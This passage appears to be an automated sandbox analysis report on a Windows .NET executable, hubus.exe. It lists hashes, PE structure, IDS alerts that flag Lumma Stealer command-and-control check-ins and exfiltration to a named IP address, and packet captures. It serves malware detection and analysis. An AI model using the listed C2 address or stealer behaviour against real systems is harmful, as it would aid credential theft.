                                                                                                                                                                                                                                                            • 104.21.112.1
                                                                                                                                                                                                                                                            Y41xQGmT37.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                            • 104.21.112.1

                                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                                            No created / dropped files found

                                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):7.787199781436822
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                            File name:hubus.exe
                                                                                                                                                                                                                                                            File size:1'361'408 bytes
                                                                                                                                                                                                                                                            MD5:43f8e85b16887df9aee3d896bd1fd7e3
                                                                                                                                                                                                                                                            SHA1:f09fae91694982e2d5dafad61b1addf0aef0abd2
                                                                                                                                                                                                                                                            SHA256:8b1984efe2ed414eef8b8c8de34f03e3fdbccf0e4782dd8d1d958a7dbdef6e7d
                                                                                                                                                                                                                                                            SHA512:a4944734427e56c42751187468f11f634f7a9bc1b948e1f8e70972b972b3c1dd6f119ef88454fb1b61d69d6500fcf5d246894eb7deaaf6484eca5b2ee43445be
                                                                                                                                                                                                                                                            SSDEEP:24576:1e4dRQpbOCHEZkjcJbzYEwiqDvR0D2zrsWf8zLWLwCc8s2BXW3tSqBkJNkXt:HQJOCHjjcFzYEwiqDaqHKLAwCcVwJwSI
                                                                                                                                                                                                                                                            TLSH:6A55F177FA8B4D21D28C1B3AE0878905B3B0598A721BF30E788523D619437FBD59A5D3
                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....dg................................. ........@.. ....................... ............`................................

                                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Entrypoint:0x54dace
                                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x676407CF [Thu Dec 19 11:47:27 2024 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x14da800x4b.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x14e0000x578.rsrc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1500000xc.reloc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                            .text0x20000x14bad40x14bc0052dc09eb66fa1cf12d005696677789d8False0.8793632547569706data7.791442134557085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .rsrc0x14e0000x5780x6009143e3a0c1a5f09d3b0d4d1e6186385aFalse0.4147135416666667data3.9890831097574466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .reloc0x1500000xc0x200d6317c53578daa34b7eb47b3aac2f7f4False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                            RT_VERSION0x14e0a00x2ecdata0.4411764705882353
                                                                                                                                                                                                                                                            RT_MANIFEST0x14e38c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                            2024-12-20T00:58:24.104291+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049744104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:24.759785+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.11.2049744104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:24.759785+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049744104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:25.047908+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049745104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:25.772976+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.11.2049745104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:25.772976+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049745104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:34.058030+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049760104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:35.185431+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049761104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:36.342508+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049762104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:37.318729+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049763104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:38.278410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049764104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:38.815041+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.11.2049764104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:39.539585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049765104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:42.379010+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.2049766104.21.112.1443TCP
                                                                                                                                                                                                                                                            2024-12-20T00:58:42.933024+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.11.2049766104.21.112.1443TCP

                                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Dec 20, 2024 00:57:57.603919983 CET4967880192.168.11.20199.232.210.172
                                                                                                                                                                                                                                                            Dec 20, 2024 00:57:57.603925943 CET4968180192.168.11.20192.229.211.108
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.818829060 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.818844080 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.819008112 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.821796894 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.821801901 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.104094982 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.104290962 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.107963085 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.107970953 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.108201981 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.153434038 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.163326979 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.163326979 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.163407087 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.759763956 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.759833097 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.759979963 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.761785984 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.761785984 CET49744443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.761801958 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.761805058 CET44349744104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.768953085 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.768973112 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.769108057 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.769356012 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:24.769365072 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.047693014 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.047908068 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.049446106 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.049453974 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.049698114 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.050864935 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.050864935 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.050941944 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.772955894 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773046017 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773102045 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773159027 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773228884 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773288965 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773308992 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773328066 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773364067 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773478031 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773582935 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773598909 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.773695946 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774308920 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774359941 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774396896 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774467945 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774483919 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774504900 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774545908 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774621010 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774794102 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774794102 CET49745443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774816036 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:25.774823904 CET44349745104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365986109 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365999937 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.366338968 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.366744995 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.366754055 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.729793072 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.729809046 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.729970932 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.730276108 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.730283022 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.794766903 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.794780970 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.794918060 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.795228004 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.795233011 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.831619978 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.831634045 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.831897020 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.832252979 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.832262993 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.855798960 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.856280088 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.856290102 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.857012987 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.857275009 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.858067036 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.858134031 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.858175993 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.902205944 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.909429073 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.909440994 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.956295013 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.217241049 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.217627048 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.217636108 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.218472004 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.218739986 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.218976021 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.219048023 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.219053030 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.262207031 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.268986940 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.268991947 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.282460928 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.282742977 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.282752037 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283477068 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283823967 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283937931 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283996105 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.284024954 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.314827919 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.330545902 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.330554962 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.378190994 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.426902056 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.426970005 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.427213907 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.427901983 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.427910089 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.429907084 CET49753443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.429923058 CET44349753172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.430170059 CET49753443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.430548906 CET49753443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.430557966 CET44349753172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.498790979 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.499191999 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.499201059 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.499897957 CET44349752172.253.124.104192.168.11.20
